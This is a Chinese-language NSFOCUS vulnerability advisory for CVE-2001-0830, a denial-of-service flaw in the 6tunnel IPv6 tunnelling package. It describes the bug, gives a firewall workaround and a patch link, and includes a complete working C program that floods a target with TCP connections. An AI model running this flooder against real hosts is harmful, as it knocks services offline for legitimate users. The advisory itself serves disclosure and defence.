首页 -> 安全研究
安全研究
安全漏洞
6Tunnel 连接关闭状态拒绝服务漏洞
发布日期:2001-10-23
更新日期:2001-10-26
受影响系统:
不受影响系统:
Wojtek Kaniewski 6tunnel 0.06
Wojtek Kaniewski 6tunnel 0.07
Wojtek Kaniewski 6tunnel 0.08
描述:
Wojtek Kaniewski 6tunnel 0.09
BUGTRAQ ID: 3467
CVE(CAN) ID: CVE-2001-0830
6Tunnel 是一个免费,开放源代码的软件包,用来为那些不提供IPv6的主机提供一个
IPv6隧道。该软件包被发现存在一个安全问题,远程攻击者可能导致合法用户无法使用
该服务。
这是由于该软件包对套接口的管理方式造成的。当一个客户段从6Tunnel服务器断开
时,该客户端以前使用的套接口进入“Close”状态,但并不会超时,因此一旦大量连
接请求被发向6Tunnel服务器,将导致该服务崩溃。
<*来源:awayzzz (awayzzz@digibel.org)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-10/0200.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6 : flood an ipv6 address.
* port : tcp port to flood (default: 667)
* delay: delay between connections (ms).
* times: max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
// tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
int ret, fd, i, ip6 = 0;
int times = DEFT, port = DEFP, delay = TIME;
struct sockaddr_in sin;
#ifdef HAVE_IPV6
struct sockaddr_in6 sin6;
#endif
if( argc < 2 )
{
char *pname;
if(!(pname = strrchr(argv[0],'/')))
pname = argv[0];
else
pname++;
printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
exit (0);
}
if(!strcmp(argv[1],"-6"))
{
#ifdef HAVE_IPV6
ip6 = 1;
#endif
argv++;
argc--;
}
if(argc > 2)
{
port = strtol(argv[2], NULL, 10);
if(!VALID_PORT(port))
{
fprintf(stderr,"Invalid port number. Using default\n");
port = DEFP;
}
}
if(argc > 3)
delay = strtol(argv[3], NULL, 10);
if(argc > 4)
times = strtol(argv[4], NULL, 10);
printf("Started with %s flood to %s on %d for %d times!\n",
(ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
for (i = 0; i < times; i++)
{
#ifdef HAVE_IPV6
if(ip6)
{
fd = socket(AF_INET6, SOCK_STREAM, 0);
memset(&sin6, 0, sizeof(sin6));
sin6.sin6_family = AF_INET6;
sin6.sin6_port = htons(port);
inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
}
else
{
#endif /* HAVE_IPV6 */
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(port);
#ifdef HAVE_IPV6
}
if(ip6)
ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
else
#endif
ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));
if(ret < 0)
{
printf("connect %d failed.\n",i);
perror("connect");
break;
}
printf("Connection no. %d\n",i);
close(fd);
usleep(delay);
}
}
/* :wq */
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 我们建议在您的防火墙上限制外部用户对该服务端口的连接请求
厂商补丁:
6Tunnel 0.09经修复了这个问题。
补丁下载地址:
ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
浏览次数:4147
严重程度:0(网友投票)
绿盟科技给您安全的保障